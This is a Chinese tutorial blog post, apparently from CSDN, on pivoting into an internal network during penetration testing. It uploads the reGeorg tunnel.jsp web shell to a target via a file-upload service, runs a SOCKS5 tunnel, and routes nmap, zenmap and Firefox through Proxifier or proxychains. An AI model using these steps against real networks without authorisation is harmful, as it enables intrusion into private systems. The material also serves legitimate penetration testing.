内网渗透使用代理访问内网

本文描述:渗透测试中,windows/linux环境下,使用代理访问内网服务器。


环境:

本地WindowsIP: 172.18.5.26

本地LinuxIP172.18.5.116

远程公网IP:  221.6.25.208

远程公网221.6.25.208映射的内网服务器ip:172.20.1.3

其中,可通过221.6.25.208:80端口提供的服务上传文件至172.20.1.3


一、 windows环境:reGeorg与proxifier

1.1  搭建reGeorg运行环境python

1.1.1 按照自己系统的环境,在 https://www.python.org/downloads/windows/下载对应的python

1.1.2 安装完后验证python是否安装成功:命令提示符下敲Python --verseion


至此,Python基本的安装完成了。

1.2  安装reGeorg

1.2.1 下载reGeorg-master (https://github.com/sensepost/reGeorg)Copy到 C:\Python27\ 

1.2.2 安装setuptools 

(a)下载ez_setup.pyhttps://pypi.python.org/pypi/setuptools#windows-simplified),Copy到 C:\Python27\ 

(b)在命令提示符下切换到C:\Python27\,依次运行如下命令

python  ez_setup.py  build

python  ez_setup.py  install

看到 Finished就可以了,表示setuptools安装成功。

1.2.3 安装Pip

(a)下载地址http://pypi.python.org/packages/source/p/pip/pip-1.0.tar.gz ,解压,目录现在可以随便放了,因为刚刚安装了setuptools.

(b) 依次运行如下命令

python  setup.py  build

python  setup.py  install

看到 Finished就可以了,表示Pip安装成功。

1.2.4 安装urllib3(urllib3reGeorg开启代理必需的模块)

在命令提示符下切换到C:\Python27\Scripts,直接运行pip   install    urllib3 

至此,reGeorg安装完成。

1.3  使用reGeorg开启socks5反向代理服务

1.3.1 上传反向代理服务端至远程主机

通过221.6.25.208:80端口提供的服务,上传C:\Python27\reGeorg-master目录下tunnel.jsp文件至远程目标机。

1.3.2 开启socks5反向代理服务

在172.18.5.26命令提示符下切换到C:\Python27\reGeorg-master,运行如下命令:

python reGeorgSocksProxy.py -p 2333 -u http://221.6.25.208/tunnel.jsp

其中,最好使用-l参数修改默认的127.0.0.10.0.0.0-p 2333用于指定监听172.18.5.262333端口。

 (python reGeorgSocksProxy.py -l 0.0.0.0 -p 2333 -u http://221.6.25.208/tunnel.jsp)

至此,已使用reGeorg开启socks5反向代理服务。

1.4  利用proxifier进行socks5代理

1.4.1 下载安装运行proxifier,即可进行socks5代理。

至此,利用proxifier进行socks5代理已完成。

1.4.2 proxifier使用注意事项

aDirect表示不使用socks5代理,直接请求;Block表示阻断请求;Proxy Socks5表示使用socks5代理服务。

b默认宜不使用Proxy Socks5,仅对需要的程序使用Socks5代理服务。



c添加某应用的所有程序

比如在windows环境下,使用zenmap进行远程内网机器的端口扫描时,需要添加的应用程序有zenmap.exenmap.exe,如下图所示:


另外,在使用namp时,注意添加-Pn参数,否则显示host down;

注意使用-sT扫描,使用-sS扫描时,端口状态为filterd

二、 Linuxkali-linux)环境:reGeorg与proxychains

2.1  安装reGeorg

参考1.2

2.2  使用reGeorg开启socks5反向代理服务

参考1.3

2.3  利用proxychains进行socks5代理

2.3.1 kali-linux默认已安装proxychains3

2.3.2 修改proxychains配置

编辑/etc/proxychains.conf文件,将socks4   127.0.0.1    9050改为:socks5      127.0.0.1     2333

至此,利用proxychains进行socks5代理已完成

2.3.4 使用方法

proxychains  工具  工具参数

例如:使用命令:proxychains  firefox,可以使用浏览器访问远程内网服务器172.20.1.3

 

三、 附录

参考:

reGeorg-master图文安装方法:

http://blog.okbase.net/webvul/archive/4599.html

如何实现Proxifier只代理部分程序:

http://jingyan.baidu.com/article/48b558e35e12f97f38c09a28.html

Socks代理反弹突破内网

http://www.freebuf.com/articles/system/12182.html


发布了20 篇原创文章 · 获赞 23 · 访问量 13万+
展开阅读全文

没有更多推荐了,返回首页

©️2019 CSDN 皮肤主题: 大白 设计师: CSDN官方博客

分享到微信朋友圈

×

扫一扫,手机浏览